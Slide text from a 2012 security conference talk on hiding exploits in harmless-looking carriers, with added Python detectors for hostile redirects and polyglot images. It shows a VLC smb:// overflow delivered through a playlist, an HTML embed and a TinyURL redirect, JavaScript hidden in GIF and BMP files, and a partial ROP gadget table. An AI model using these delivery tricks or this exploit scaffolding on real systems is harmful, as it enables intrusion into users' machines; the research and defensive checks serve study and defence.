when Bad Things come in Good packages

Saumil Shah
net-square, DEEPSEC 2012
# who am i
Saumil Shah, CEO Net-Square.
• Hacker, Speaker, Trainer, Author - 15 yrs in Infosec.
• M.S. Computer Science, Purdue University.
• saumil@net-square.com
• LinkedIn: saumilshah
• Twitter: @therealsaumil

My area of work
• Penetration Testing
• Reverse Engineering
• Exploit Writing
• New Research
• Offensive Security
• Attack Defense
• Conference Speaker
• Conference Trainer
• "Eyes and ears open"
When two forces combine...

Web Hacking
Binary Exploits
SNEAKY
LETHAL
302   IMG   JS   HTML5
VLC smb overflow
• smb://example.com@0.0.0.0/foo/#{AAAAAAAA....}
• Classic Stack Overflow.
VLC XSPF file
<?xml version="1.0" encoding="UTF-8"?>
<playlist version="1"
   xmlns="http://xspf.org/ns/0/"
   xmlns:vlc="http://www.videolan.org/vlc/playlist/ns/0/">
 <title>Playlist</title>
 <trackList>
  <track>
   <location>
      smb://example.com@0.0.0.0/foo/#{AAAAAAAA....}
   </location>
   <extension
      application="http://www.videolan.org/vlc/playlist/0">
     <vlc:id>0</vlc:id>
   </extension>
  </track>
 </trackList>
</playlist>
Alpha Encoded Exploit
Tiny URL
ZOMFG!
100% Pure Alphanum!
VLC smb overflow - HTMLized!!

<embed type="application/x-vlc-plugin"
       width="320" height="200"
       target="http://tinyurl.com/ycctrzf"
       id="vlc" />
301 Redirect from tinyurl
The shortened URL resolves to a 301 whose Location header carries the whole alphanumeric exploit in the URL fragment:

HTTP/1.1 301 Moved Permanently
X-Powered-By: PHP/5.2.12
Location: smb://example.com@0.0.0.0/foo/
Content-type: text/html
Content-Length: 0
Connection: close
Server: TinyURL/1.6
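A defender-side triage check for the delivery chain on the slides above, added here as an example (not code from the talk): it parses a raw HTTP redirect and flags a Location that points at a non-web scheme, carries userinfo in front of a bare IP, or has an oversized, purely alphanumeric fragment. The sample response is constructed to mirror the TinyURL reply with a placeholder run of "A" in place of the real payload; MAX_FRAGMENT is an assumed threshold.

```python
"""Triage a raw HTTP redirect for the pattern used above: a URL shortener
answering with a Location header that sends a browser plugin to smb://...
Added example, not from the talk. MAX_FRAGMENT is an assumed threshold;
the sample responses are constructed."""
from __future__ import annotations

from urllib.parse import urlsplit

WEB_SCHEMES = {"http", "https"}
REDIRECT_CODES = {"301", "302", "303", "307", "308"}
MAX_FRAGMENT = 256  # assumption: ordinary fragments are short anchor names


def parse_response_headers(raw: bytes) -> tuple[str, dict[str, str]]:
    """Split a raw response into (status line, {lower-cased name: value}).

    Only the header block before the first blank line is read; folded
    continuation lines (leading whitespace) are appended to the previous
    header, which matters when a long Location value has been wrapped."""
    head = raw.split(b"\r\n\r\n", 1)[0].split(b"\n\n", 1)[0]
    lines = head.decode("latin-1").splitlines()
    if not lines:
        return "", {}
    status, headers, last = lines[0], {}, None
    for line in lines[1:]:
        if line[:1] in (" ", "\t") and last is not None:
            headers[last] += line.strip()
            continue
        name, _, value = line.partition(":")
        last = name.strip().lower()
        headers[last] = value.strip()
    return status, headers


def redirect_findings(raw: bytes) -> list[str]:
    """Return the reasons a redirect looks hostile; an empty list means clean."""
    status, headers = parse_response_headers(raw)
    parts = status.split()
    if len(parts) < 2 or parts[1] not in REDIRECT_CODES:
        return []
    location = headers.get("location")
    if location is None:
        return []
    url = urlsplit(location)
    findings = []
    if url.scheme.lower() not in WEB_SCHEMES:
        findings.append(f"redirect to non-web scheme {url.scheme!r}")
    if url.username is not None:
        # "example.com@0.0.0.0" reads like a hostname but is really userinfo
        findings.append(f"userinfo {url.username!r} in front of host {url.hostname!r}")
    if len(url.fragment) > MAX_FRAGMENT:
        findings.append(f"fragment is {len(url.fragment)} characters long")
        if url.fragment.strip("{}").isalnum():
            findings.append("oversized fragment is pure alphanumerics")
    return findings


# Constructed sample: the TinyURL reply from the slide, with the real payload
# replaced by a placeholder run of "A" characters.
SUSPICIOUS_RESPONSE = (
    b"HTTP/1.1 301 Moved Permanently\r\n"
    b"X-Powered-By: PHP/5.2.12\r\n"
    b"Location: smb://example.com@0.0.0.0/foo/#{" + b"A" * 300 + b"}\r\n"
    b"Content-type: text/html\r\n"
    b"Content-Length: 0\r\n"
    b"Connection: close\r\n"
    b"Server: TinyURL/1.6\r\n"
    b"\r\n"
)

# Constructed sample: an ordinary shortener redirect.
BENIGN_RESPONSE = (
    b"HTTP/1.1 301 Moved Permanently\r\n"
    b"Location: https://example.com/docs/#install\r\n"
    b"Content-Length: 0\r\n"
    b"\r\n"
)

if __name__ == "__main__":
    for name, raw in (("benign", BENIGN_RESPONSE), ("suspicious", SUSPICIOUS_RESPONSE)):
        print(name, redirect_findings(raw) or ["clean"])
```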
Exploits as Images - 1
• Grayscale encoding (0-255).
• 1 pixel = 1 character.
• Perfectly valid image.
• Decode and Execute!
I'm an evil Javascript

I'm an innocent image
// packv: turn a 32-bit value into two %u escapes in little-endian word order
function packv(n)
{
  var s = new Number(n).toString(16);
  while (s.length < 8) s = "0" + s;
  return (unescape("%u" + s.substring(4, 8) + "%u" + s.substring(0, 4)));
}
// gadget address table
var addressof = new Array();
addressof["ropnop"] = 0x6d81bdf0;
addressof["xchg_eax_esp_ret"] = 0x6d81bdef;
addressof["pop_eax_ret"] = 0x6d906744;
addressof["pop_ecx_ret"] = 0x6d81cd57;
addressof["mov_peax_ecx_ret"] = 0x6d979720;
addressof["mov_eax_pecx_ret"] = 0x6d8d7be0;
addressof["mov_pecx_eax_ret"] = 0x6d8eee01;
addressof["inc_eax_ret"] = 0x6d838f54;
addressof["add_eax_4_ret"] = 0x00000000;
addressof["call_peax_ret"] = 0x6d8aec31;
addressof["add_esp_24_ret"] = 0x00000000;
addressof["popad_ret"] = 0x6d82a8a1;
addressof["call_peax"] = 0x6d802597;
function call_ntallocatevirtualmemory(baseptr, size, callnum)
{
  var ropnop = packv(addressof["ropnop"]);
  var pop_eax_ret = packv(addressof["pop_eax_ret"]);
  var pop_ecx_ret = packv(addressof["pop_ecx_ret"]);
  var mov_peax_ecx_ret = packv(addressof["mov_peax_ecx_ret"]);
  var mov_eax_pecx_ret = packv(addressof["mov_eax_pecx_ret"]);
  var mov_pecx_eax_ret = packv(addressof["mov_pecx_eax_ret"]);
  var call_peax_ret = packv(addressof["call_peax_ret"]);
  var add_esp_24_ret = packv(addressof["add_esp_24_ret"]);
  var popad_ret = packv(addressof["popad_ret"]);
  var retval = "";
  // the slide image shows only this much of the script
}




         <CANVAS>
See no eval()

Same Same No Different!

      var a = eval(str);

      a = (new Function(str))();
IMAJS

I iz being a Javascript
IMAJS

   <img src="itsatrap.gif">
   <script src="itsatrap.gif"></script>
IMAJS-GIF Browser Support

Height  Width  Browser/Viewer   Image Renders?  Javascript Executes?
2f 2a   00 00  Firefox          yes             yes
2f 2a   00 00  Safari           yes             yes
2f 2a   00 00  IE               no              yes
2f 2a   00 00  Chrome           yes             yes
2f 2a   00 00  Opera            ?               ?
2f 2a   00 00  Preview.app      yes             -
2f 2a   00 00  XP Image Viewer  no              -
2f 2a   00 00  Win 7 Preview    yes             -
IMAJS-BMP Browser Support

Height  Width  Browser/Viewer   Image Renders?  Javascript Executes?
2f 2a   00 00  Firefox          yes             yes
2f 2a   00 00  Safari           yes             yes
2f 2a   00 00  IE               yes             yes
2f 2a   00 00  Chrome           yes             yes
2f 2a   00 00  Opera            yes             yes
2f 2a   00 00  Preview.app      yes             -
2f 2a   00 00  XP Image Viewer  yes             -
2f 2a   00 00  Win 7 Preview    yes             -
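A file-level check for the header shape listed in the two tables above, added here as an example (not code from the talk). It assumes the 2f 2a / 00 00 bytes sit immediately after the format magic (offsets 6-7 for GIF, 2-3 for BMP), which is what lets a script engine read GIF89a/* or BM/* as an identifier followed by an open comment; the sample files are constructed header fragments.

```python
"""Flag image files whose header bytes are shaped like an IMAJS polyglot.
Added example, not from the talk. Assumption: the 2f 2a / 00 00 bytes in the
tables sit right after the format magic (offsets 6-7 for GIF, 2-3 for BMP),
so a script engine sees "GIF89a/*" or "BM/*": an identifier, then an open
comment that hides the pixel data until a later "*/". Samples are constructed."""
from __future__ import annotations

import struct

COMMENT_OPEN, COMMENT_CLOSE = b"/*", b"*/"

# magic -> offset of the first header field after the magic (assumed layout)
FORMATS = {b"GIF87a": 6, b"GIF89a": 6, b"BM": 2}


def detect_format(data: bytes) -> tuple[bytes, int] | None:
    """Return (magic, field offset) for a recognised image, else None."""
    for magic, offset in FORMATS.items():
        if data.startswith(magic):
            return magic, offset
    return None


def _printable(tail: bytes) -> bool:
    """True when the bytes after a comment close look like text, not pixels."""
    return bool(tail.strip()) and all(32 <= b < 127 or b in b"\r\n\t" for b in tail)


def polyglot_findings(data: bytes) -> list[str]:
    """Return the reasons this image could also run as script (empty = clean)."""
    fmt = detect_format(data)
    if fmt is None:
        return ["unrecognised image format"]
    magic, offset = fmt
    field = data[offset:offset + 2]
    findings = []
    if field == COMMENT_OPEN:
        # For GIF this is the first dimension field of the logical screen
        # descriptor (0x2a2f, with the other dimension zero); for BMP it is the
        # low half of the file-size field, which decodes to a plausible size,
        # so only the text view of the bytes gives it away.
        value = struct.unpack("<H", field)[0]
        findings.append(f"{magic.decode()} header field at offset {offset} is '/*' (0x{value:04x})")
        # A working polyglot has to close the comment and leave script after it.
        close = data.rfind(COMMENT_CLOSE)
        if close > offset and _printable(data[close + 2:]):
            findings.append(f"printable trailer of {len(data) - close - 2} bytes after the last '*/'")
    return findings


# Constructed samples: header bytes only, enough to exercise the checks.
CLEAN_GIF = b"GIF89a" + struct.pack("<HH", 4, 4) + b"\x00\x00\x00" + b"\x3b"
SUSPICIOUS_GIF = b"GIF89a" + b"/*" + b"\x00\x00" + b"\x00\x00\x00" + b"\x3b" + b"*/ trailing text"
CLEAN_BMP = b"BM" + struct.pack("<I", 58) + b"\x00" * 8
SUSPICIOUS_BMP = b"BM" + b"/*" + b"\x00\x00" + b"\x00" * 8 + b"*/ trailing text"

if __name__ == "__main__":
    for name, blob in (("clean.gif", CLEAN_GIF), ("trap.gif", SUSPICIOUS_GIF),
                       ("clean.bmp", CLEAN_BMP), ("trap.bmp", SUSPICIOUS_BMP)):
        print(name, polyglot_findings(blob) or ["clean"])
```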
The αq Exploit




Demo




   IMAJS     αq     FTW!




Alpha encoded exploit code




   IMAJS CANVAS "loader" script
These are not the sploits
you're looking for
No virus threat detected




The FUTURE?




when Bad Things come in Good packages

THE END
@therealsaumil
saumil@net-square.com
